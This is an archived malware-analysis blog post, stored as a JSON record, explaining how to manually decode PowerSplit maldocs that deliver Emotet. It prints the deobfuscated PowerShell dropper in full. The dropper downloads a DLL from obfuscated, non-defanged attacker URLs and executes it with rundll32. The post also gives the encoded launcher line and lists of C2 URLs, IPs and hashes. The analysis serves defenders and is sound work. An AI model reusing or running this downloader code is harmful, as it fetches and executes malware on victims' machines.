{
	"id": "50bf7931-2bba-46f3-b55c-1bd9c01bfe67",
	"created_at": "2026-04-06T00:07:58.697671Z",
	"updated_at": "2026-04-10T13:13:08.67311Z",
	"deleted_at": null,
	"sha1_hash": "18148db41266afa60030469ab3a8afb2d774c4a1",
	"title": "Manual analysis of new PowerSplit maldocs delivering Emotet",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1728739,
	"plain_text": "Manual analysis of new PowerSplit maldocs delivering Emotet\r\nBy Published by R3MRUM View all posts by R3MRUM\r\nPublished: 2021-01-06 · Archived: 2026-04-06 00:05:48 UTC\r\nWow. It’s been a long time since my last blog post (~ 2 years). The new year has inspired me to dust off some cobwebs and\r\nproduce a blog post that hopefully someone can learn from.\r\nIn this post, I’ll be covering how to perform manual analysis of the new PowerSplit malicious documents (maldocs) that\r\nwere first seen in the wild starting in mid/late December 2020. Thus far, I’ve only seen this version of PowerSplit delivering\r\nEmotet but in the past it has delivered other families such as Retefe and Gozi ISFB.\r\nPreferably, initial analysis of these types of maldocs would simply consist of submitting the sample some kind of sandbox\r\nenvironment. Since PowerSplit doesn’t employ any kind of anti-analysis or anti-vm controls, other than some obfuscation,\r\nthe sample should fully detonate and the malicious powershell command executed by the maldoc should be present within\r\nthe detonation output. The target audience for this post are those who either want to get their hands dirty or do not have the\r\nability to submit their sample to a sandbox.\r\nNote for the reader: My analysis in this post details the shortcut I use in order to quickly get to the important artifacts such\r\nas malicious command executed by the maldoc and the corresponding C2 URLs embedded within. This shortcut skips over a\r\nfew concepts like how the macro is automatically executed when the document is opened and how I determined that\r\nDdyw4mboy7b (referenced later on) is an instance of the winmgmtS:win32_process class for the sake of brevity.\r\nSample for reference:\r\nhttps://www.virustotal.com/gui/file/1b14150ed4bc2faa4dadc5e2096f77175c8274927c13aae437a9cc57ff26fd3b/\r\nInitial Setup\r\nCopy the maldoc into a virtual machine (VM) isolated from the network (Host-Only mode). This is kind of a big deal.\r\nTriple check that this host doesn’t have network access to anything.\r\nWithin the isolated VM, open the maldoc with Microsoft Word. You should be presented with something similar to this:\r\nhttps://r3mrum.wordpress.com/2021/01/05/manual-analysis-of-new-powersplit-maldocs-delivering-emotet/\r\nPage 1 of 11\n\nEnable editing by selecting View –\u003e Edit Document from the toolbar menu.\r\nEnsure that you have the Developer tab enabled (File –\u003e Options –\u003e Customize Ribbon –\u003e Add ‘Developer’ to the Main\r\nTabs). You should see the Developer tab, like so:\r\nAnalysis in VB Editor\r\nOn the Developer tab, click the Visual Basic button. This will open the Visual Basic (VB) Editor where you can access the\r\nembedded macros. Locate the module that contains macro code. Thus far, these PowerSplit maldocs have only contained\r\ntwo entries in the modules section. In this example, one module is named E2ajbo3kwzka_d5z and the other is\r\nQtep_eof7eoc0a. As shown in this screenshot, the module Qtep_eof7eoc0a is empty. So, we can ignore it.\r\nhttps://r3mrum.wordpress.com/2021/01/05/manual-analysis-of-new-powersplit-maldocs-delivering-emotet/\r\nPage 2 of 11\n\nIn the module that contains the code (E2ajbo3kwzka_d5z), scroll to the very bottom and then slowly scroll up, looking for\r\nthe pattern:\r\n\u003crandom_string\u003e.Create \u003crandom_string\u003e(\u003crandom_string\u003e), \u003crandom_string\u003e,\u003crandom_string\u003e\r\nIt will likely be the first ‘long’ line you will encounter as you scroll up. In this sample, it is on line 233 of the macro:\r\nDdyw4mboy7b.Create Jmz4_bcx3_h(Kb3vxm90vt0_lgn8r3), Zj0kk9rvc7emht, Coyz3quoogwk6on\r\nBreaking down what this means\r\nDdyw4mboy7b is an instance of the winmgmtS:win32_process class. The Create function of this class is being called with\r\n3 arguments:\r\nArg1 = Jmz4_bcx3_h(Kb3vxm90vt0_lgn8r3)\r\nArg2 = Zj0kk9rvc7emht\r\nArg3 = Coyz3quoogwk6on\r\nMicrosoft’s documentation on win32_process’s Create function says that the first argument\r\n(Jmz4_bcx3_h(Kb3vxm90vt0_lgn8r3)) passed to the Create function is the CommandLine value to be executed. The value\r\nbeing passed is actually a call to a function named Jmz4_bcx3_h. This is the maldoc’s string decoder function that takes in\r\nan encoded string, stored in the variable Kb3vxm90vt0_lgn8r3, and returns the decoded version.\r\nArg2 (Zj0kk9rvc7emht) and Arg3 (Coyz3quoogwk6on) represent the CurrentDirectory and ProcessStartupInformation\r\nrespectively. For the purposes of this analysis, we dont care about Arg2 and Arg3… but we need to somehow capture the\r\ndecoded value that is ultimately passed as Arg1.\r\nTo do this, we need to first comment out the line containing the call to win32_process’s Create function so that it does not\r\nexecute. This can be accomplished by prepending a single quotation mark to the beginning of the line. This essentially\r\nhttps://r3mrum.wordpress.com/2021/01/05/manual-analysis-of-new-powersplit-maldocs-delivering-emotet/\r\nPage 3 of 11\n\ndefangs the maldoc.\r\nNext, we need to capture the decoded Arg1 value, which represents the command that the maldoc is attempting to execute.\r\nWe can accomplish this by printing out the result of the string decoder function call that was originally passed as Arg1 to the\r\nDdyw4mboy7b.Create function.\r\nThere are a few ways to do this but my preferred method is to use Debug.Print(). Add a Debug.Print statement, passing it the\r\nArg1 value, just above the line commented. If done right, the macro will look like this:\r\nIn order to see the output when the Debug.Print statement is called, we need to enable the ‘Immediate Window’. To do this,\r\neither hit CTRL+G or go to View –\u003e Immediate Window within the VB Editor. If done correctly, a new window labeled\r\nImmediate will appear at the bottom of the VB Editor window.\r\nNow save the modified macro in the VB Editor (CTRL+S).\r\nBefore moving on to the next step, I must reiterate to only do this within an isolated virtual machine. Even though we\r\ntechnically defanged THIS document, there is the potential that a different variant could have additional code that\r\nwe have not accounted for in this analysis. Failing to detonate in an isolated VM could result in host system infection\r\nand potential spreading to other resources on the network… that would be bad.\r\nNow switch back to the Word document from the VB Editor and click the ‘Enable Content’ button. Doing so will\r\nautomatically execute the embedded macro… but this is what we want to happen. We want the macro to execute so that\r\nthe string decoding will take place and the decoded string will be printed by the Debug.Print statement that we inserted. The\r\nactual malicious command will not execute because we commented out the line that was responsible for that action.\r\nTo see if this worked correctly, go back to the VB Editor and inspect the contents of the Immediate window. You should see\r\nthe decoded command that the maldoc was attempting to execute.\r\nhttps://r3mrum.wordpress.com/2021/01/05/manual-analysis-of-new-powersplit-maldocs-delivering-emotet/\r\nPage 4 of 11\n\nFor this sample, the malicious command being executed by the maldoc is a base64 encoded powershell command that\r\nincludes a pop-up message box that is displayed to the victim when run (Note: this command has not been defanged. DO\r\nNOT RUN on un-isolated host):\r\ncmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. \u0026 POwersheLL -w hidden -ENCOD\r\n\u003cSlight Tangent\u003e\r\nA vast majority of the code contained within this macro is junk code that has been inserted to cause confusion and to\r\ncomplicate analysis. In this example, all code pertaining to the writing of some file is junk code and can be removed without\r\nimpacting the functionality of the macro. The junk code pattern is:\r\nDim \u003crandom_string\u003e As String\r\nOpen \"\u003crandom_string\u003e\" For Binary As \u003crandom_int\u003e\r\nPut #\u003crandom_int\u003e, , \u003crandom_string\u003e\r\nClose #\u003crandom_int\u003e\r\nKnowing this, you could clean up the code a bit by doing a find for the following regex pattern and replacing it with\r\nnothing:\r\nDim.*\\nOpen.*\\nPut.*\\nClose.*\r\nAdditionally, since control flow is executed in order and doesn’t jump around, the GoTo statements included can also be\r\nconsidered junk. Doing a similar find/replace for the following pattern cleans up the code even further:\r\n*Goto.*\\n{1,}.*:\\n\r\nTaking these two steps reduced the total lines of code in the macro from 348 to 24, revealing the true core code that is\r\nleveraged by the maldoc:\r\nhttps://r3mrum.wordpress.com/2021/01/05/manual-analysis-of-new-powersplit-maldocs-delivering-emotet/\r\nPage 5 of 11\n\n\u003c/Slight Tangent\u003e\r\nEncoded PowerShell Analysis\r\nOnce base64-decoded, the heavily encoded powershell script being executed is:\r\n1\r\n2\r\n3\r\n4\r\n5\r\n6\r\n7\r\n8\r\n9\r\n10\r\n11\r\n12\r\n13\r\n14\r\n15\r\n$E3Sy   = [TYPE] ( \"{4}{3}{0}{1}{5}{2}\" -\r\nf 'M.Io.D' , 'iRe' , 'TORY' , 'Ste' , 'sy' , 'C' ) ;\r\nSeT-ITEM VARIabLE:i7RpVz ( [TYPE] ( \"{1}{4}{2}{0}{6}{3}{7}{5}\" -f\r\n'ET.SeRVi' , 'S' , 'TEm.N' , 'INT' , 'yS' , 'AnAgEr' , 'CePo' , 'M' )) ;\r\n$Xsejjoo =( 'N' +( 'avc' + 'lg' )+ 'u' );\r\n$Slfr1gp = $Rpb56t4 + [char] (64) + $U9nybjs ;\r\n$Wwuhcfs =(( 'U_m' + '4k' )+ 'pq' );\r\n( gET-vARIaBle   e3sY -vAlUeOn ):: \"CReaTEDire`c`ToRY\" ( $HOME + (( 'Y' + 'b' + 'sR' +\r\n( 'g064' + '6rYbs' + 'Q' + '9' )+( '0xm' + 'rq' + 'Yb' )+ 's' ) -REPlaCe\r\n( 'Y' + 'bs' ), [cHAr] 92));\r\n$K309qw1 =(( 'Rq' + 'rm' )+( 'b2' + '8' ));\r\n( Ls variAble:i7rPvZ ).vaLUe:: \"SEcUri`TYpRo`TOc`ol\" = (( 'Tls' + '1' )+ '2' );\r\n$Nmh1wmf =(( 'X3b6' + 'g' )+ 'a' + 'o' );\r\n$Ojz_wa7 = ( 'M' +( '8jkl' + 'v4' ));\r\n$Xgtwzgh =(( 'Cc' + 'k0h' )+ '16' );\r\n$Qqayu6h =( 'B' +( 'e6' + 'f' )+( 'r' + 'w0' ));\r\nhttps://r3mrum.wordpress.com/2021/01/05/manual-analysis-of-new-powersplit-maldocs-delivering-emotet/\r\nPage 6 of 11\n\n16\r\n17\r\n18\r\n19\r\n20\r\n21\r\n22\r\n23\r\n24\r\n25\r\n26\r\n27\r\n28\r\n29\r\n30\r\n31\r\n$Jdgza5o = $HOME +(( '{0' + '}Rg0646r' + '{' + '0}Q90' + 'xmrq{' + '0}' ) -F  \r\n[ChAR] 92)+ $Ojz_wa7 +(( '.' + 'dl' )+ 'l' );\r\n$N05q5t5 =( 'O' +( '_' + '3' + 'e2pf' ));\r\n$Gkhm1tg = neW-Ob `j`ECT NeT.WEBClieNt;\r\n$Jkdys0o =(((( 'ht' + 't' + 'p:J' + ')(3s2)' ))+( '(' + 'J)(3s2' + ')' )+\r\n(( '(zh' + 'o' ))+( 'ngs' + 'h' + 'ixingc' + 'hua' )+( 'n' + 'g.' )+ 'c' + 'om' +\r\n(( 'J)(3s2' + ')' ))+ '(' + 'wp' +( '-' + 'adminJ' )+(( ')(' ))+(( '3s' + '2)' ))+\r\n(( '(OTmJ' + ')(' + '3s' + '2)(@' ))+( 'ht' + 't' )+( 'p' + ':J' )+\r\n(( ')' + '(3s2' ))+(( ')(' + 'J' ))+(( ')(' + '3s' ))+ '2' +(( ')\r\n(' ))+ 'w' + 'w' + 'w' +( '.gre' + 'a' )+ 'u' +( 'ds' + 'tu' )+( 'd' + 'io' )+\r\n(( '.c' + 'omJ)' + '(3s' ))+ '2' +(( ')(d' + 'o' + 'cs' ))+\r\n(( 'J' + ')' + '(3s2)' ))+(( '(FGnJ' + ')' + '(' + '3' + 's2)(@http:J)\r\n(' ))+ '3' + 's' +(( '2)(' + 'J)' + '(3s' ))+(( '2)(k' + 'o' ))+ 'r' +\r\n( 'ea' + 'nk' + 'id' )+( 's' + 'ed' )+( 'u.c' + 'om' )+(( 'J)(' + '3' ))+ 's2' +\r\n(( ')(' + 'wp-co' + 'n' ))+( 'ten' + 't' )+(( 'J)' ))+(( '(3' + 's2)(' ))+\r\n( '2c' + 'Q' )+(( 'ThJ' + ')' ))+(( '(3' + 's' ))+(( '2)' + '(@ht' + 't' + 'p:J)\r\n(' + '3s2)(J' + ')' + '(' ))+( '3s' + '2' )+ ')' + '(' +\r\n( 'exp' + 'edi' )+ 'ti' + 'o' +( 'nq' + 'ue' )+ 'st' + '.c' + 'o' + 'mJ' +(( ')\r\n(' ))+(( '3s' + '2' + ')(XJ)(' ))+(( '3s' + '2)' ))+\r\n(( '(' + '@http' + 's:J' ))+ ')' + '(' +(( '3s' + '2)' + '(J' + ')(3' ))+\r\n(( 's' + '2)(' ))+( 'su' + 'r' )+ 'i' +( 'agr' + 'o' )+( 'f' + 'res' + 'h.' )+\r\n( 'co' + 'm' )+(( 'J)(3s' + '2' ))+(( ')(se' + 're' ))+(( 'versJ)' + '(3s' ))+(( '2)\r\n(' + 'M' ))+ 'VD' + 'j' +(( 'IJ)(3s2' + ')(' + '@' ))+(( 'htt' + 'p:' + 'J)\r\n(3' ))+ 's2' +(( ')' + '(J)' + '(3s' ))+(( '2)(g' + 'e' + 'of' ))+\r\n( 'f' + 'og' )+ 'le' +( 'mus' + 'ic' + '.' )+(( 'comJ)' + '(3' + 's2)' + '(' + 'wp-a' + 'd' ))+(( 'mi' + 'n' + 'J)(' ))+(( '3s2)(x' + 'J)(3' + 's2)' + '(' ))+ '@' +\r\n( 'h' + 'ttp' )+(( 's:J)(' + '3' + 's2' ))+(( ')' + '(J' ))+(( ')(' ))+(( '3s' + '2)\r\n(' ))+( 'd' + 'ag' )+( 'r' + 'ani' )+ 't' +( 'egiare' + '.co' + 'mJ' )+ ')' +\r\n( '(3s2' + ')' )+ '(' +( 'w' + 'p-' )+( 'a' + 'dmin' )+(( 'J' + ')\r\n(' ))+ '3' + 's' + '2' +(( ')' + '(jCHJ' + ')(3' ))+ 's' +(( '2' + ')\r\n(' )))). \"RePla`Ce\" ((((( 'J)(3' + 's' ))+(( '2' + ')(' )))),( [array] ( '/' ),\r\n( 'hw' + 'e' ))[0]). \"S`PliT\" ( $Biy7vfz + $Slfr1gp + $Z7vulcv );\r\n$Dmqi8pi =( 'P' +( 'jdu' + 'dc9' ));\r\nforeach ( $Zp5knry in $Jkdys0o | S`ORt-`oBJ`E`Ct {g`ET-r`An`DOm}){\r\ntry{\r\n$Gkhm1tg . \"DOwnlo`A`DfILE\" ( $Zp5knry , $Jdgza5o );\r\n$Zdcj0cn =( 'H' +( '3' + 'q09k' )+ 'q' );\r\nIf ((\u0026( 'Get-It' + 'e' + 'm' ) $Jdgza5o ). \"L`eng`TH\" -ge 39887) {\r\n\u0026( 'r' + 'un' + 'dll32' ) $Jdgza5o , '#1' . \"TOs`T`RinG\" ();\r\n$Hao086y =( 'Ok' + 'mb' +( 'e0' + '8' ));\r\nhttps://r3mrum.wordpress.com/2021/01/05/manual-analysis-of-new-powersplit-maldocs-delivering-emotet/\r\nPage 7 of 11\n\nbreak ;\r\n$Yvi_mtb =(( 'B0' + 'f0' )+ 'kg' + 'm' )\r\n}\r\n}\r\ncatch{}\r\n}\r\n$Pf4ctyc =(( 'K' + 'jo' )+ '4' +( 'bm' + 'g' ))\r\nNote for the reader: formatting of the above code was cleaned up a bit by putting individual statements on their own line as\r\nopposed the original format which had everything on a single line.\r\nThough encoding styles have changed over time, the PowerSplit maldoc has been generally consistent with how it stores and\r\ndecodes its C2 URLs. The consistency of this format is actually how PowerSplit got its name (the amalgamation of\r\n“PowerShell” and the Split() function) . Line 16 highlighted in the code above (and displayed below) contains the pattern\r\nthat we need to look for. Typically, with PowerSplit, the C2 URLs are contained within a large encoded string (highlighted\r\nin green) that is passed through a replace function (highlighted in red) that performs the ‘decode’. The decoded string, which\r\nnow consists of concatenated C2 URLS separated by some delimiter, is then passed to a split function (highlighted in blue)\r\nthat converts the single string into an array of C2 URLs:\r\n$Jkdys0o=((((‘ht’+’t’+’p:J’+’)(3s2)’))+(‘(‘+’J)(3s2’+’)’)+((‘(zh’+’o’))+(‘ngs’+’h’+’ixingc’+’hua’)+(‘n’+’g.’)+’c’+’om’+\r\n((‘J)(3s2’+’)’))+'(‘+’wp’+(‘-‘+’adminJ’)+((‘)(‘))+((‘3s’+’2)’))+((‘(OTmJ’+’)(‘+’3s’+’2)(@’))+(‘ht’+’t’)+(‘p’+’:J’)+\r\n((‘)’+'(3s2’))+((‘)(‘+’J’))+((‘)(‘+’3s’))+’2’+((‘)(‘))+’w’+’w’+’w’+(‘.gre’+’a’)+’u’+(‘ds’+’tu’)+(‘d’+’io’)+\r\n((‘.c’+’omJ)’+'(3s’))+’2’+((‘)(d’+’o’+’cs’))+((‘J’+’)’+'(3s2)’))+((‘(FGnJ’+’)’+'(‘+’3’+’s2)(@http:J)(‘))+’3’+’s’+((‘2)\r\n(‘+’J)’+'(3s’))+((‘2)(k’+’o’))+’r’+(‘ea’+’nk’+’id’)+(‘s’+’ed’)+(‘u.c’+’om’)+((‘J)(‘+’3’))+’s2’+((‘)(‘+’wp-co’+’n’))+\r\n(‘ten’+’t’)+((‘J)’))+((‘(3’+’s2)(‘))+(‘2c’+’Q’)+((‘ThJ’+’)’))+((‘(3’+’s’))+((‘2)’+'(@ht’+’t’+’p:J)(‘+’3s2)(J’+’)’+'(‘))+\r\n(‘3s’+’2′)+’)’+'(‘+(‘exp’+’edi’)+’ti’+’o’+(‘nq’+’ue’)+’st’+’.c’+’o’+’mJ’+((‘)(‘))+((‘3s’+’2’+’)(XJ)(‘))+((‘3s’+’2)’))+\r\n((‘(‘+’@http’+’s:J’))+’)’+'(‘+((‘3s’+’2)’+'(J’+’)(3′))+((‘s’+’2)(‘))+(‘su’+’r’)+’i’+(‘agr’+’o’)+(‘f’+’res’+’h.’)+(‘co’+’m’)+\r\n((‘J)(3s’+’2’))+((‘)(se’+’re’))+((‘versJ)’+'(3s’))+((‘2)(‘+’M’))+’VD’+’j’+((‘IJ)(3s2’+’)(‘+’@’))+((‘htt’+’p:’+’J)(3’))+’s2’+\r\n((‘)’+'(J)’+'(3s’))+((‘2)(g’+’e’+’of’))+(‘f’+’og’)+’le’+(‘mus’+’ic’+’.’)+((‘comJ)’+'(3’+’s2)’+'(‘+’wp-a’+’d’))+\r\n((‘mi’+’n’+’J)(‘))+((‘3s2)(x’+’J)(3’+’s2)’+'(‘))+’@’+(‘h’+’ttp’)+((‘s:J)(‘+’3’+’s2’))+((‘)’+'(J’))+((‘)(‘))+((‘3s’+’2)(‘))+\r\n(‘d’+’ag’)+(‘r’+’ani’)+’t’+(‘egiare’+’.co’+’mJ’)+’)’+(‘(3s2’+’)’)+'(‘+(‘w’+’p-‘)+(‘a’+’dmin’)+((‘J’+’)(‘))+’3’+’s’+’2’+\r\n((‘)’+'(jCHJ’+’)(3′))+’s’+((‘2’+’)(‘)))).“RePla Ce\"((((('J)(3'+'s'))+(('2'+')(')))),([array]('/'),('hw'+'e'))\r\n[0]) . \"S PliT”($Biy7vfz + $Slfr1gp + $Z7vulcv);\r\nTo decode, copy and paste the above line into a PowerShell command prompt an hit Enter. This will place the decoded\r\ncontents into the variable $Jkdys0o. Then type the variable name ($Jkdys0o in this case) and hit Enter to display the\r\nvariable’s contents, which should be the list of C2 URLs:\r\nhttps://r3mrum.wordpress.com/2021/01/05/manual-analysis-of-new-powersplit-maldocs-delivering-emotet/\r\nPage 8 of 11\n\nOutput (Note: URLs manually defanged):\r\nhxxp://zhongshixingchuang[.]com/wp-admin/OTm/@hxxp://www.greaudstudio[.]com/docs/FGn/@hxxp://koreankidsedu[.]com/wp-content/2cQTh/@hxxp://expeditionquest[.]com/X/@hxxps://suriagrofresh[.]com/serevers/MVDjI/@hxxp://geoffoglemusic[.]com/w\r\nadmin/x/@hxxps://dagranitegiare[.]com/wp-admin/jCH/\r\nBecause we extracted this single line from the script, the code that initializes and assigns values to the variables $Biy7vfz,\r\n$Slfr1gp, and $Z7vulcv that are used in the Split function is missing. As a result, the URL string was never properly\r\nconverted to an array… but that is ok. We can apply some common sense here and realize that the string was split via the\r\n‘@’ symbol which would have yielded the following output:\r\nhxxp://zhongshixingchuang[.]com/wp-admin/OTm/\r\nhxxp://www.greaudstudio[.]com/docs/FGn/\r\nhxxp://koreankidsedu[.]com/wp-content/2cQTh/\r\nhxxp://expeditionquest[.]com/X/\r\nhxxps://suriagrofresh[.]com/serevers/MVDjI/\r\nhxxp://geoffoglemusic[.]com/wp-admin/x/\r\nhxxps://dagranitegiare[.]com/wp-admin/jCH/\r\nEmotet Binary\r\nAt the time of analysis, these C2 URLs were serving up Emotet.\r\nMD5\r\nSHA1\r\nSHA256\r\n53cccd74cdd275d5388405f26eda4de4\r\n225923659b850fcf5d3d53acec94de55e4f28114\r\ncf4bcb53551a7a8e87edd6ebe1382981cc6280eed58905870d04219a12801e83\r\nVT Link\r\nSince Emotet analysis isn’t the focus of this blog, I’ll simply suggest here that you use something like the CAPEv2 Sandbox\r\nto also automatically extract the Emotet configuration from the binary downloaded by the PowerSplit maldoc. For example:\r\nhttps://capesandbox.com/analysis/110589/#CAPE\r\nhttps://r3mrum.wordpress.com/2021/01/05/manual-analysis-of-new-powersplit-maldocs-delivering-emotet/\r\nPage 9 of 11\n\nConfigured Emotet C2s:\r\n184.66.18[.]83:80\r\n202.187.222[.]40:80\r\n167.71.148[.]58:443\r\n211.215.18[.]93:8080\r\n1.234.65[.]61:80\r\n80.15.100[.]37:80\r\n155.186.9[.]160:80\r\n172.104.169[.]32:8080\r\n110.39.162[.]2:443\r\n12.162.84[.]2:8080\r\n181.136.190[.]86:80\r\n68.183.190[.]199:8080\r\n191.223.36[.]170:80\r\n190.45.24[.]210:80\r\n81.213.175[.]132:80\r\n181.120.29[.]49:80\r\n82.76.111[.]249:443\r\n177.23.7[.]151:80\r\n95.76.153[.]115:80\r\n93.148.247[.]169:80\r\n51.255.165[.]160:8080\r\n213.52.74[.]198:80\r\n178.250.54[.]208:8080\r\n202.134.4[.]210:7080\r\n138.97.60[.]141:7080\r\n94.176.234[.]118:443\r\n190.24.243[.]186:80\r\n46.43.2[.]95:8080\r\n197.232.36[.]108:80\r\n77.78.196[.]173:443\r\n59.148.253[.]194:8080\r\n212.71.237[.]140:8080\r\n46.101.58[.]37:8080\r\n110.39.160[.]38:443\r\n83.169.21[.]32:7080\r\n189.2.177[.]210:443\r\n81.214.253[.]80:443\r\n51.15.7[.]145:80\r\n172.245.248[.]239:8080\r\n177.85.167[.]10:80\r\n178.211.45[.]66:8080\r\n5.196.35[.]138:7080\r\n71.58.233[.]254:80\r\n168.121.4[.]238:80\r\n149.202.72[.]142:7080\r\n185.183.16[.]47:80\r\n191.241.233[.]198:80\r\n209.236.123[.]42:8080\r\n190.114.254[.]163:8080\r\n70.32.84[.]74:8080\r\n138.97.60[.]140:8080\r\nhttps://r3mrum.wordpress.com/2021/01/05/manual-analysis-of-new-powersplit-maldocs-delivering-emotet/\r\nPage 10 of 11\n\n68.183.170[.]114:8080\r\n192.232.229[.]53:4143\r\n62.84.75[.]50:80\r\n113.163.216[.]135:80\r\n46.105.114[.]137:8080\r\n177.144.130[.]105:8080\r\n192.232.229[.]54:7080\r\n192.175.111[.]212:7080\r\n35.143.99[.]174:80\r\n81.215.230[.]173:443\r\n1.226.84[.]243:8080\r\n187.162.248[.]237:80\r\n152.169.22[.]67:80\r\n137.74.106[.]111:7080\r\n191.182.6[.]118:80\r\n181.61.182[.]143:80\r\n202.79.24[.]136:443\r\n50.28.51[.]143:8080\r\n85.214.26[.]7:8080\r\n170.81.48[.]2:80\r\n111.67.12[.]222:8080\r\n177.144.130[.]105:443\r\n188.225.32[.]231:7080\r\n185.94.252[.]27:443\r\n12.163.208[.]58:80\r\n191.53.80[.]88:80\r\n87.106.46[.]107:8080\r\n122.201.23[.]45:443\r\n181.30.61[.]163:443\r\n104.131.41[.]185:8080\r\n190.195.129[.]227:8090\r\n45.184.103[.]73:80\r\n186.146.13[.]184:443\r\n45.16.226[.]117:443\r\n187.162.250[.]23:443\r\n2.80.112[.]146:80\r\n60.93.23[.]51:80\r\n24.232.228[.]233:80\r\n190.251.216[.]100:80\r\n105.209.235[.]113:8080\r\n217.13.106[.]14:8080\r\n190.64.88[.]186:443\r\n118.38.110[.]192:80\r\n111.67.12[.]221:8080\r\n201.75.62[.]86:80\r\n70.32.115[.]157:8080\r\n188.135.15[.]49:80\r\nSource: https://r3mrum.wordpress.com/2021/01/05/manual-analysis-of-new-powersplit-maldocs-delivering-emotet/\r\nhttps://r3mrum.wordpress.com/2021/01/05/manual-analysis-of-new-powersplit-maldocs-delivering-emotet/\r\nPage 11 of 11",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://r3mrum.wordpress.com/2021/01/05/manual-analysis-of-new-powersplit-maldocs-delivering-emotet/"
	],
	"report_names": [
		"manual-analysis-of-new-powersplit-maldocs-delivering-emotet"
	],
	"threat_actors": [],
	"ts_created_at": 1775434078,
	"ts_updated_at": 1775826788,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/18148db41266afa60030469ab3a8afb2d774c4a1.pdf",
		"text": "https://archive.orkl.eu/18148db41266afa60030469ab3a8afb2d774c4a1.txt",
		"img": "https://archive.orkl.eu/18148db41266afa60030469ab3a8afb2d774c4a1.jpg"
	}
}